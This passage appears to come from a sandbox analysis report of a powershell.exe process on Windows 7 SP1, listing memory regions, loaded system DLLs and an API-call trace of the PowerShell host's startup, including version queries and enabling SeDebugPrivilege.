"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll") Region: id = 816 start_va = 0x7fee5920000 end_va = 0x7fee5fc4fff entry_point = 0x7fee5920000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll") Region: id = 817 start_va = 0x7fee9e20000 end_va = 0x7fee9e26fff entry_point = 0x7fee9e20000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll") Region: id = 818 start_va = 0x28a0000 end_va = 0x28b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028a0000" filename = "" Region: id = 819 start_va = 0x28c0000 end_va = 0x28c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 820 start_va = 0x7fee5480000 end_va = 0x7fee5603fff entry_point = 0x7fee5480000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll") Region: id = 821 start_va = 0x7ff00180000 end_va = 0x7ff0018ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00180000" filename = "" Region: id = 822 start_va = 0x7ff00190000 end_va = 0x7ff0019ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00190000" filename = "" Region: id = 823 start_va = 0x7ff001a0000 end_va = 0x7ff001affff entry_point = 0x0 region_type = private name = "private_0x000007ff001a0000" filename = "" Region: id = 824 start_va = 0x7ff001b0000 end_va = 0x7ff001bffff entry_point = 0x0 region_type = private name = "private_0x000007ff001b0000" filename = "" Region: id = 825 start_va = 0x7ff001c0000 end_va = 0x7ff001cffff entry_point = 0x0 region_type = private name = "private_0x000007ff001c0000" filename = "" Region: id = 826 start_va = 0x7ff001d0000 end_va = 0x7ff001dffff entry_point = 0x0 region_type = private name = "private_0x000007ff001d0000" filename = "" Region: id = 827 start_va = 0x7ff001e0000 end_va = 0x7ff001effff entry_point = 0x0 region_type = private name = "private_0x000007ff001e0000" filename = "" Region: id = 828 start_va = 0x7fefd930000 end_va = 0x7fefd93afff entry_point = 0x7fefd930000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 829 start_va = 0x7ff001f0000 end_va = 0x7ff001fffff entry_point = 0x0 region_type = private name = "private_0x000007ff001f0000" filename = "" Region: id = 830 start_va = 0x7ff00200000 end_va = 0x7ff0020ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00200000" filename = "" Region: id = 831 start_va = 0x7ff00210000 end_va = 0x7ff0021ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00210000" filename = "" Region: id = 832 start_va = 0x7fefd960000 end_va = 0x7fefd984fff entry_point = 0x7fefd960000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 833 start_va = 0x1b900000 end_va = 0x1b9fffff entry_point = 0x0 region_type = private name = "private_0x000000001b900000" filename = "" Region: id = 834 start_va = 0x2a50000 end_va = 0x2a50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 835 start_va = 0x1ba00000 end_va = 0x1bcfefff entry_point = 0x1ba00000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 836 start_va = 0x7fee4c30000 end_va = 0x7fee547afff entry_point = 0x7fee4c30000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll") Region: id = 837 start_va = 0x7fefdb40000 end_va = 0x7fefdb4efff entry_point = 0x7fefdb40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 838 start_va = 0x7fefdb70000 end_va = 0x7fefdcd6fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 839 start_va = 0x7fefe0a0000 end_va = 0x7fefe0a7fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 840 start_va = 0x7feff950000 end_va = 0x7feff99cfff entry_point = 0x7feff950000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 841 start_va = 0x7ff00220000 end_va = 0x7ff0022ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00220000" filename = "" Region: id = 842 start_va = 0x7ff00230000 end_va = 0x7ff0023ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00230000" filename = "" Region: id = 843 start_va = 0x2a60000 end_va = 0x2a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 844 start_va = 0x2a70000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 845 start_va = 0x2a90000 end_va = 0x2a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 846 start_va = 0x2aa0000 end_va = 0x2aaffff entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 847 start_va = 0x7ff00240000 end_va = 0x7ff0024ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00240000" filename = "" Region: id = 848 start_va = 0x7ff00250000 end_va = 0x7ff0025ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00250000" filename = "" Region: id = 849 start_va = 0x7ff00260000 end_va = 0x7ff0026ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00260000" filename = "" Region: id = 850 start_va = 0x1be00000 end_va = 0x1c78ffff entry_point = 0x0 region_type = private name = "private_0x000000001be00000" filename = "" Region: id = 851 start_va = 0x7fefda80000 end_va = 0x7fefda93fff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 852 start_va = 0x7ff00270000 end_va = 0x7ff0027ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00270000" filename = "" Region: id = 853 start_va = 0x7fffff0e000 end_va = 0x7fffff0ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff0e000" filename = "" Region: id = 854 start_va = 0x1bd00000 end_va = 0x1bd7ffff entry_point = 0x0 region_type = private name = "private_0x000000001bd00000" filename = "" Region: id = 855 start_va = 0x7fffff0c000 end_va = 0x7fffff0dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0c000" filename = "" Region: id = 856 start_va = 0x1c920000 end_va = 0x1c99ffff entry_point = 0x0 region_type = private name = "private_0x000000001c920000" filename = "" Region: id = 857 start_va = 0x7fee4ae0000 end_va = 0x7fee4c22fff entry_point = 0x7fee4ae0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\091b931d0f6408001747dbbbb05dbe66\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\091b931d0f6408001747dbbbb05dbe66\\system.configuration.ni.dll") Region: id = 858 start_va = 0x7fffff0a000 end_va = 0x7fffff0bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff0a000" filename = "" Region: id = 859 start_va = 0x7fef6090000 end_va = 0x7fef60f1fff entry_point = 0x7fef6090000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 860 start_va = 0x7fef99a0000 end_va = 0x7fef99bbfff entry_point = 0x7fef99a0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 861 start_va = 0x7fefb5a0000 end_va = 0x7fefb5b0fff entry_point = 0x7fefb5a0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 862 start_va = 0x7fefd330000 end_va = 0x7fefd384fff entry_point = 0x7fefd330000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 863 start_va = 0x1c9a0000 end_va = 0x1cbfffff entry_point = 0x0 region_type = private name = "private_0x000000001c9a0000" filename = "" Region: id = 864 start_va = 0x7fefcd30000 end_va = 0x7fefcd36fff entry_point = 0x7fefcd30000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 865 start_va = 0x7fefd320000 end_va = 0x7fefd326fff entry_point = 0x7fefd320000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 866 start_va = 0x2ab0000 end_va = 0x2acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ab0000" filename = "" Region: id = 867 start_va = 0x1c7a0000 end_va = 0x1c81ffff entry_point = 0x0 region_type = private name = "private_0x000000001c7a0000" filename = "" Region: id = 868 start_va = 0x7fefaba0000 end_va = 0x7fefac03fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 869 start_va = 0x7fefac10000 end_va = 0x7fefac80fff entry_point = 0x7fefac10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 870 start_va = 0x7fffff08000 end_va = 0x7fffff09fff entry_point = 0x0 region_type = private name = "private_0x000007fffff08000" filename = "" Region: id = 871 start_va = 0x7fefb550000 end_va = 0x7fefb576fff entry_point = 0x7fefb550000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 872 start_va = 0x7fefb540000 end_va = 0x7fefb54afff entry_point = 0x7fefb540000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 873 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d0fff entry_point = 0x7fefb3c0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 874 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b7fff entry_point = 0x7fefb3a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 875 start_va = 0x7fefcf90000 end_va = 0x7fefcf99fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 876 start_va = 0x1ca40000 end_va = 0x1cabffff entry_point = 0x0 region_type = private name = "private_0x000000001ca40000" filename = "" Region: id = 877 start_va = 0x1cb80000 end_va = 0x1cbfffff entry_point = 0x0 region_type = private name = "private_0x000000001cb80000" filename = "" Region: id = 878 start_va = 0x7fefd1b0000 end_va = 0x7fefd20afff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 879 start_va = 0x7fffff06000 end_va = 0x7fffff07fff entry_point = 0x0 region_type = private name = "private_0x000007fffff06000" filename = "" Region: id = 880 start_va = 0x1cc00000 end_va = 0x1cd6ffff entry_point = 0x0 region_type = private name = "private_0x000000001cc00000" filename = "" Region: id = 881 start_va = 0x7fefab90000 end_va = 0x7fefab97fff entry_point = 0x7fefab90000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 882 start_va = 0x7fefb3f0000 end_va = 0x7fefb442fff entry_point = 0x7fefb3f0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 883 start_va = 0x1cd70000 end_va = 0x1cfaffff entry_point = 0x0 region_type = private name = "private_0x000000001cd70000" filename = "" Region: id = 884 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 885 start_va = 0x7ff00280000 end_va = 0x7ff0028ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00280000" filename = "" Region: id = 886 start_va = 0x2ae0000 end_va = 0x2ae3fff entry_point = 0x2ae0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 887 start_va = 0x7feff770000 end_va = 0x7feff8e7fff entry_point = 0x7feff770000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 888 start_va = 0x7fefe0b0000 end_va = 0x7fefe1d9fff entry_point = 0x7fefe0b0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 889 start_va = 0x7feff490000 end_va = 0x7feff6e8fff entry_point = 0x7feff490000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 890 start_va = 0x2af0000 end_va = 0x2af0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Thread: id = 43 os_tid = 0xbfc [0129.119] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0129.611] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0129.612] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0130.649] GetVersionExW (in: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.651] GetVersionExW (in: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdbc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.666] GetVersionExW (in: lpVersionInformation=0xcd930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd930*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0130.666] SetErrorMode (uMode=0x1) returned 0x1 [0130.667] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcda90 | out: lpFileInformation=0xcda90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0130.668] SetErrorMode (uMode=0x1) returned 0x1 [0130.681] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdd00 | out: lpdwHandle=0xcdd00) returned 0x94c [0130.684] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bc7108 | out: lpData=0x2bc7108) returned 1 [0130.687] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdc78, puLen=0xcdc70 | out: lplpBuffer=0xcdc78*=0x2bc71a4, puLen=0xcdc70) returned 1 [0130.689] lstrlenW (lpString="䅁") returned 1 [0130.715] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7280, puLen=0xcdbe0) returned 1 [0130.715] lstrlenW (lpString="Microsoft Corporation") returned 21 [0130.717] CoTaskMemAlloc (cb=0x2e) returned 0x1a4400 [0130.717] lstrcpyW (in: lpString1=0x1a4400, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0130.718] CoTaskMemFree (pv=0x1a4400) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc72d4, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation") returned 28 [0130.719] CoTaskMemAlloc (cb=0x3c) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7330, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.719] CoTaskMemAlloc (cb=0x20) returned 0x1a2bd0 [0130.719] lstrcpyW (in: lpString1=0x1a2bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.719] CoTaskMemFree (pv=0x1a2bd0) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7370, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.719] CoTaskMemAlloc (cb=0x44) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc73d8, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0130.719] CoTaskMemAlloc (cb=0x76) returned 0x147840 [0130.719] lstrcpyW (in: lpString1=0x147840, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0130.719] CoTaskMemFree (pv=0x147840) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7474, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.719] CoTaskMemAlloc (cb=0x44) returned 0x165e40 [0130.719] lstrcpyW (in: lpString1=0x165e40, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.719] CoTaskMemFree (pv=0x165e40) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc74d8, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0130.719] CoTaskMemAlloc (cb=0x58) returned 0x10bb70 [0130.719] lstrcpyW (in: lpString1=0x10bb70, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0130.719] CoTaskMemFree (pv=0x10bb70) [0130.719] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc7554, puLen=0xcdbe0) returned 1 [0130.719] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.719] CoTaskMemAlloc (cb=0x20) returned 0x1a2bd0 [0130.720] lstrcpyW (in: lpString1=0x1a2bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.720] CoTaskMemFree (pv=0x1a2bd0) [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x2bc71fc, puLen=0xcdbe0) returned 1 [0130.720] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0130.720] CoTaskMemAlloc (cb=0x66) returned 0x19b6b0 [0130.720] lstrcpyW (in: lpString1=0x19b6b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0130.720] CoTaskMemFree (pv=0x19b6b0) [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdbe8, puLen=0xcdbe0 | out: lplpBuffer=0xcdbe8*=0x0, puLen=0xcdbe0) returned 0 [0130.720] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbb8, puLen=0xcdbb0 | out: lplpBuffer=0xcdbb8*=0x2bc71a4, puLen=0xcdbb0) returned 1 [0130.722] CoTaskMemAlloc (cb=0x204) returned 0x14d390 [0130.722] VerLanguageNameW (in: wLang=0x0, szLang=0x14d390, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0130.725] CoTaskMemFree (pv=0x14d390) [0130.725] VerQueryValueW (in: pBlock=0x2bc7108, lpSubBlock="\\", lplpBuffer=0xcdc08, puLen=0xcdc00 | out: lplpBuffer=0xcdc08*=0x2bc7130, puLen=0xcdc00) returned 1 [0130.752] GetCurrentProcessId () returned 0xbf8 [0130.783] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xccb30 | out: lpLuid=0xccb30*(LowPart=0x14, HighPart=0)) returned 1 [0130.786] GetCurrentProcess () returned 0xffffffffffffffff [0130.787] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xccb50 | out: TokenHandle=0xccb50*=0x2ec) returned 1 [0130.789] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2bca980*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.794] CloseHandle (hObject=0x2ec) returned 1 [0130.807] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbf8) returned 0x2ec [0130.822] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2bca9e8, cb=0x200, lpcbNeeded=0xcdb68 | out: lphModule=0x2bca9e8, lpcbNeeded=0xcdb68) returned 1 [0130.825] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f120000, lpmodinfo=0x2bcac58, cb=0x18 | out: lpmodinfo=0x2bcac58*(lpBaseOfDll=0x13f120000, SizeOfImage=0x77000, EntryPoint=0x13f12c63c)) returned 1 [0130.826] CoTaskMemAlloc (cb=0x804) returned 0x1b5340 [0130.826] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f120000, lpBaseName=0x1b5340, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0130.826] CoTaskMemFree (pv=0x1b5340) [0130.829] CoTaskMemAlloc (cb=0x804) returned 0x1b5340 [0130.829] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f120000, lpFilename=0x1b5340, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0130.829] CoTaskMemFree (pv=0x1b5340) [0130.830] CloseHandle (hObject=0x2ec) returned 1 [0130.843] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xbf8) returned 0x2ec [0130.844] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0xcdc98 | out: lpExitCode=0xcdc98*=0x103) returned 1 